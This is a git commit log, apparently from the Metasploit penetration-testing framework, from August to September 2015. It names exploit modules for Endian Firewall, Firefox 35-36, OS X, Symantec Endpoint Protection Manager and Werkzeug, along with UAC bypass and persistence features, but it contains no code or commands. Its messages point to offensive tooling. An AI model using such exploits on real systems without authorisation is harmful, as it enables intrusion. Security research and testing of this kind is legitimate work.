Fixed url normalization
2015-09-05 10:07:58 +02:00
JT 2f8dc7fdab Update w3tw0rk_exec.rb
changed response to res
2015-09-05 14:21:07 +08:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
Ewerson Guimaraes (Crash) 68d27acd69 Update
Add exploit-db references
nil check  to version
2015-09-04 23:18:24 +02:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
Ewerson Guimaraes (Crash) 5b5e97f37a Update
Add normalize_uri
Change print_status  tp vprint_status
Removed unused http headers
an other minor changes
2015-09-04 22:12:42 +02:00
Roberto Soares cc405957db Add some improvements 2015-09-04 16:02:30 -03:00
Roberto Soares 4531d17cab Added the rest of the code 2015-09-04 15:37:42 -03:00
Roberto Soares b9ba12e42a Added get_token method. 2015-09-04 15:27:28 -03:00
Ewerson Guimaraes (Crash) 5063acac3c Poorly designed argument fixed
Poorly designed argument fixed
2015-09-04 19:43:49 +02:00
HD Moore 04d622b69b Cleanup Jenkins-CI module titles and option descriptions 2015-09-04 10:25:51 -07:00
Ewerson Guimaraes (Crash) cf8b34191d Updates
Add Def for  cgi request.
2015-09-04 19:19:02 +02:00
Roberto Soares 6f4f8e34b4 Added method bolt_login. 2015-09-04 10:45:15 -03:00
wchen-r7 d55757350d Use the latest credential API, no more report_auth_info 2015-09-04 03:04:14 -05:00
Roberto Soares a195f5bb9e Initial commit - Skeleton 2015-09-04 04:09:16 -03:00
jvazquez-r7 ef6df5bc26
Use get_target_arch 2015-09-03 16:30:46 -05:00
jvazquez-r7 2588439246
Add references for the win32k info leak 2015-09-03 15:35:41 -05:00
James Lee b2c401696b
Add certutil support.
Tested while landing #5736
2015-09-03 14:24:37 -05:00
James Lee 1e6a1f6d05 Revert "Fix spec like I shoulda done before landing #5736"
This reverts commit 956c8e550d.

Conflicts:
	spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:55 -05:00
Ewerson Guimaraes (Crash) 92aa09a586 Merge remote-tracking branch 'rapid7/master' into Uptime 2015-09-03 20:48:50 +02:00
Ewerson Guimaraes (Crash) 6250983fb4 Update
Update
2015-09-03 20:29:57 +02:00
James Lee b4547711f3
Add certutil support.
Tested while landing #5736
2015-09-03 13:27:10 -05:00
jvazquez-r7 697a6cd335
Rescue the process execute 2015-09-03 13:03:36 -05:00
jvazquez-r7 80a1e32339
Set Manual Ranking 2015-09-03 12:24:45 -05:00
HD Moore 9b51352c62
Land #5639, adds registry persistence 2015-09-03 11:26:38 -05:00
jvazquez-r7 dbe901915e
Improve version detection 2015-09-03 09:54:38 -05:00
jvazquez-r7 de25a6c23c
Add metadata 2015-09-02 18:32:45 -05:00
jvazquez-r7 8f70ec8256
Fix Disclosure date 2015-09-02 18:21:36 -05:00
jvazquez-r7 b912e3ce65
Add exploit template 2015-09-02 17:28:35 -05:00
HD Moore 4090c2c8ea
Land #5880, adds ScriptHost UAC bypass for Win7/2008 2015-09-02 14:14:18 -05:00
Meatballs 582cc795ac
Remove newlines 2015-09-02 19:42:04 +01:00
HD Moore 43d3e69fb2
Land #5917, update local exploit checks 2015-09-02 12:55:45 -05:00
HD Moore 95b9208a63 Change recv to get_once to avoid indefinite hangs, cosmetic tweaks. 2015-09-02 10:30:19 -05:00
xistence a81a9e0ef8 Added TIME_WAIT for GUI windows 2015-09-02 16:55:20 +07:00
Meatballs 8f25a006a8
Change to automatic target 2015-09-02 09:13:25 +01:00
wchen-r7 4275a65407 Update local exploit checks to follow the guidelines.
Please see wiki "How to write a check() method" to learn how
these checkcodes are determined.
2015-09-01 23:26:45 -05:00
Meatballs 27775fbe58
Restrict to 7 and 2k8 2015-09-01 22:23:37 +01:00
HD Moore cd65478d29
Land #5826, swap ExitFunction -> EXITFUNC 2015-09-01 13:58:12 -05:00
Christian Mehlmauer bfc24aea16
change exitfunc to thread 2015-09-01 10:52:25 +02:00
Christian Mehlmauer 115f409fef
change exitfunc to thread 2015-09-01 10:48:07 +02:00
Christian Mehlmauer 5398bf78eb
change exitfunc to thread 2015-09-01 10:46:54 +02:00
Christian Mehlmauer 3e613dc333
change exitfunc to thread 2015-09-01 10:43:45 +02:00
Christian Mehlmauer 648c034d17
change exitfunc to thread 2015-09-01 10:42:15 +02:00
Ewerson Guimaraes (Crash) 252e80e793 Uptime Version 7.4.0 / 7.5.0 Upload and Exec file
Uptime Version 7.4.0 / 7.5.0 Upload and Exec file
2015-08-31 23:57:39 +02:00
Brent Cook d670a62000
Land #5822, migrate obsolete payload compatibility options 2015-08-31 15:20:20 -05:00
wchen-r7 9364982467
Land #5665, Add osx rootpipe entitlements exploit for 10.10.3 2015-08-28 13:33:16 -05:00
wchen-r7 e45347e745 Explain why vulnerable 2015-08-28 13:26:01 -05:00
wchen-r7 423d52476d Normal options should be all caps 2015-08-28 13:24:23 -05:00
Muhamad Fadzil Ramli 1b4f4fd225
remove url reference 2015-08-27 19:47:37 +08:00
jvazquez-r7 da4b360202
Fix typo 2015-08-26 15:29:34 -05:00
jvazquez-r7 5d0ed797a3
Update DLL 2015-08-26 15:15:32 -05:00
jvazquez-r7 dd529013f6
Update ruby side 2015-08-26 15:12:09 -05:00
JT ff868f9704 Update w3tw0rk_exec.rb 2015-08-26 23:51:09 +08:00
JT 3f6c04a445 Update w3tw0rk_exec.rb 2015-08-26 23:48:31 +08:00
JT 16341d34a2 Update w3tw0rk_exec.rb 2015-08-26 23:34:29 +08:00
JT 892f427664 Update w3tw0rk_exec.rb
removed w3tw0rk_login
2015-08-26 09:18:15 +08:00
JT 6edba2cdc8 Update w3tw0rk_exec.rb 2015-08-26 09:11:30 +08:00
JT c77226c354 Update w3tw0rk_exec.rb 2015-08-26 01:28:07 +08:00
JT 25fb325410 w3tw0rk / Pitbul IRC Bot Remote Code Execution 2015-08-26 01:22:55 +08:00
Brent Cook b1ef560264
Merge payload_inject 64-bit inject fix from @Meatballs1 2015-08-24 09:26:00 -05:00
Muhamad Fadzil Ramli 03b1ad7491
add reference info 2015-08-24 11:18:26 +08:00
Muhamad Fadzil Ramli 73cb1383d2
amend banner info for check 2015-08-24 10:55:43 +08:00
Meatballs 1c91b126f1
X64 compat for payload_inject 2015-08-23 22:03:57 +01:00
Meatballs 228087dced
Initial working scripthost bypass uac 2015-08-23 20:16:15 +01:00
Muhamad Fadzil Ramli 7587319602
run rubocop & msftidy 2015-08-23 23:32:30 +08:00
Muhamad Fadzil Ramli a5daa5c9be
added module descriptions 2015-08-23 23:12:41 +08:00
Muhamad Fadzil Ramli 91a7531af8
konica minolta ftp server post auth cwd command exploit 2015-08-23 21:49:26 +08:00
wchen-r7 dc1e7e02b6
Land #5853, Firefox 35-36 RCE one-click exploi 2015-08-20 13:27:21 -05:00
wchen-r7 45c7e4760a Support x64 payloads 2015-08-20 02:09:58 -05:00
Brent Cook 6b94513a37
Land #5860, add tpwn OS X local kernel exploit (https://github.com/kpwn/tpwn) 2015-08-17 17:41:04 -05:00
William Vu 26165ea93f Add tpwn module 2015-08-17 17:11:11 -05:00
Brent Cook b17d8f8d49
Land #5768, update modules to use metasploit-credential 2015-08-17 17:08:58 -05:00
joev 98e2d074c3 Add disclosure date. 2015-08-15 20:09:41 -05:00
joev a133e98ba5 Adds a ff 35-36 RCE vector based off the recent ff bug. 2015-08-15 20:02:00 -05:00
HD Moore 42e08cbe07 Fix bad use of get_profile (now browser_profile) 2015-08-14 19:50:42 -05:00
jvazquez-r7 c02df6b39d
Land #5800, @bperry's Symantec Endpoint Protection Manager RCE module 2015-08-14 17:03:48 -05:00
jvazquez-r7 b33abd72ce
Complete description 2015-08-14 17:03:21 -05:00
jvazquez-r7 4aa3be7ba2
Do ruby fixing and use FileDropper 2015-08-14 17:00:27 -05:00
Spencer McIntyre 33f1324fa9
Land #5813, @jakxx adds VideoCharge SEH file exploit 2015-08-13 18:01:25 -04:00
jakxx e9d3289c23 EXITFUNC caps 2015-08-13 17:25:31 -04:00
jakxx 6e1c714b2b Update to leverage auto-NOP generation 2015-08-13 17:24:18 -04:00
jakxx 361624161b msftidy 2015-08-13 16:27:27 -04:00
jakxx 03eb2d71b2 Add watermark fileformat exploit 2015-08-13 16:26:17 -04:00
William Vu f19186adda
Land #5841, homm3_h3m default target change 2015-08-13 14:54:58 -05:00
Tod Beardsley 02c6ea31bb
Use the more recent HD version as default target 2015-08-13 14:42:21 -05:00
Christian Mehlmauer 80a22412d9 use EXITFUNC instead of ExitFunction 2015-08-13 21:22:32 +02:00
William Vu 605a14350f
Land #5833, sshexec improvements 2015-08-13 14:16:22 -05:00
William Vu 3bd6c4cee4 Add a comma 2015-08-13 14:16:09 -05:00
Mo Sadek 677ec341dd
Land #5839, pre-bloggery cleanup edits 2015-08-13 13:43:57 -05:00
William Vu c94a185610
Land #5697, Werkzeug debug RCE 2015-08-13 13:32:27 -05:00
William Vu d54ee19ce9 Clean up module 2015-08-13 13:32:22 -05:00
Tod Beardsley bb4116ed9d
Avoid msftidy.rb rule breaking on missing newline 2015-08-13 12:38:05 -05:00
jakxx e7566d6aee Adding print_status line 2015-08-12 16:08:04 -04:00
Spencer McIntyre 28fbb7cdde Update the description of the sshexec module 2015-08-12 16:05:09 -04:00
Spencer McIntyre dfe2bbf1e9 Add a python target to the sshexec module 2015-08-12 15:46:47 -04:00
Christian Mehlmauer 979d7e6be3
improve module 2015-08-12 15:37:37 +02:00